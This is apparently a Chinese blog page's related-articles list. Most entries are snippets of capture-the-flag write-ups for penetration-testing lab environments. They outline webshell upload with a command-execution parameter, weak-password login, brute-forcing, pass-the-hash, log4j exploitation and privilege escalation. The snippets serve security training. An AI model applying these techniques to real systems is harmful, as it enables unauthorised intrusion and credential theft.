dom-delegation-stream:与委托一起流式处理dom事件
05-13
var events = require ( 'dom-delegation-stream' ) var values = require ( 'dom-value-stream' ) events ( document . body , 'input' , 'input[type=text]' ) . pipe ( values ( ) ) . pipe ( wherever ( ) ) ...
春秋云境 Delegation WP
最新发布
m0_62466350的博客
01-13 977
本文首发作者博客园https://www.cnblogs.com/fdxsec/p/17962704Delegation是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
WP-春秋云境-Tsclient专业徽章通关指南-flag01
qq_45234543的博客
01-04 864
Wp-春秋云镜Tsclient专业徽章Flag01
春秋云境】CVE-2022-22733靶场WP
果粒程
12-07 1710
春秋云境】CVE-2022-22733靶场WP
春秋云境】CVE-2022-28512靶场WP
果粒程
11-26 1282
春秋云境】CVE-2022-28512靶场WP
my-delegation-poker-源码.rar
10-10
【标题】"my-delegation-poker-源码.rar" 提供的是一个名为 "my-delegation-poker" 的项目源代码,通常这代表了一个用于进行委派扑克(Delegation Poker)的游戏或工具。委派扑克是一种敏捷开发中的管理工具,帮助...
authorization-delegation-schemas-1.0.7-sources.jar
03-11
官方版本,亲测可用
authorization-delegation-schemas-1.0.7.jar
03-11
官方版本,亲测可用
春秋云镜-Delegation-Writeup
qq_35607078的博客
08-14 839
春秋云镜-Delegation-Writeup
【内网渗透】春秋云镜Intitle WP
Sapphire037的博客
04-23 2348
第一次正式接触内网渗透的东西,写的很新手,也适合新手观看,有问题可以私信或评论,接下来会持续更新。
春秋云境Certify-WP一遍过】
weixin_63576152的博客
10-12 501
这里有几个用户名被修改成*了 因为都是些个人的账号密码,再联系前面扫到的三个3389端口,尝试爆破172.22.9.26(域控和CA域不大可能,172.22.9.26这个域内机器是最有可能的)开代理,先看172.22.9.47 文件服务器,刚好也开了445端口(TCP端口),直接可以连接。扫描可以看到一个solr,solr一般会有log4j漏洞,看到有log4j组件。再次远程连接172.22.9.26,成功,但是没有管理员权限,所以没什么用处。导出数据,编为字典user.txt和pass.txt,爆破。
【内网渗透】春秋云镜 Tsclient WP
Sapphire037的博客
05-15 1208
mssql连接和攻击、windows提权、令牌窃取、镜像劫持。
春秋云境】CVE-2022-22963靶场WP和CVE-2022-22909靶场WP
果粒程
12-06 1590
春秋云境】CVE-2022-22963靶场WP和CVE-2022-22909靶场WP
春秋云境Initial-WP(附带详细代理过程)
weixin_63576152的博客
10-01 573
用Thinkphpgui查找漏洞(一开始因为工具版本问题,一直不能getshell,心疼我的小砂砾),得到木马网址和密码。flag02在C://Users/Administrator/flag/flag02.txt中。fscan扫描172.22.1.0/24,结果默认保存在同目录下的result.txt中。利用frp和proxifier代理,可以访问到172.22.1.18(frp代理过程。用crackmapexec去进行hash传递攻击,使得我们可以访问到DC上的文件。
春秋云境Time-WP一遍过】
weixin_63576152的博客
10-11 495
重置了很多次靶机,所以靶机ip变化请忽略。
春秋云镜已做题目のWP (2)
Fab1an的博客
10-16 533
既然题目说有文件上传漏洞,那我们就寻找进来之后点来点去,没发现上传点,发现左边可以登录。试一下弱口令,账号admin密码admin,成功登录进去之后的左边Users那里可以上传,直接上传一句话木马文件php?上传成功,访问我们上传的文件的位置,成功RCE,接下来可以cat /flag了s=cat /f*
春秋云境】CVE-2022-23134靶场WP和CVE-2022-22965靶场WP
果粒程
12-05 1223
春秋云境】CVE-2022-23134靶场WP和CVE-2022-22965靶场WP
春秋云境】CVE-2021-44983靶场WP和CVE-2021-40282靶场WP
果粒程
12-14 619
春秋云境】CVE-2021-44983靶场WP和CVE-2021-40282靶场WP
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值